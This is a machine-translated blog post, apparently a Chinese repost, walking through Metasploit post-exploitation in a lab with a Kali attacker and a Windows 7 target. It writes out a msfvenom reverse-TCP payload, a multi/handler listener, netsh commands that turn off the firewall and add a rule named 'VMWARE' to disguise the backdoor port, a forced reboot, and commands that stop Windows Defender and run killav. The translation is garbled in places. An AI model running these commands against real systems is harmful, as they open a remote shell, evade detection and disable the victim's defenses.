当前位置:网站首页>Intranet information collection of Intranet penetration (I)

Intranet information collection of Intranet penetration (I)

2022-07-06 14:07:00 Unknown white hat

Catalog

Metasploit Intranet information collection

01msf rebound shell

02msf rebound shell

03 adopt shell Turn off firewall

04 Turn off antivirus software

Intranet information collection of Intranet penetration ( Two )_ Unknown white hat blog -CSDN Blog


Metasploit Intranet information collection

attack kali 192.168.0.103

Drone aircraft win7 192.168.0.105

01msf rebound shell

First generate a payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf rebound shell

Configure the bounce session handler

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

take payload Send it to the target machine to execute

Successful implementation

linux Can't recognize window Chinese characters can be garbled , Modify the code page (65001 It stands for UTF-8)

03 adopt shell Turn off firewall

shell(execute -f cmd -i -H)

netsh advfirewall set allprofiles state off ( Turn off firewall )

netsh advfirewall show allprofiles ( Check the firewall status )

Add firewall rules through policies to hide behaviors

netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow

netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL

Restart and take effect ( Make win7 restart ):

shutdown -r -f -t 0

04 Turn off antivirus software

close windefend

net stop windefend

Turn off antivirus software

run killav

run post/windows/manage/killav

原网站

版权声明
本文为[Unknown white hat]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/187/202207060918047803.html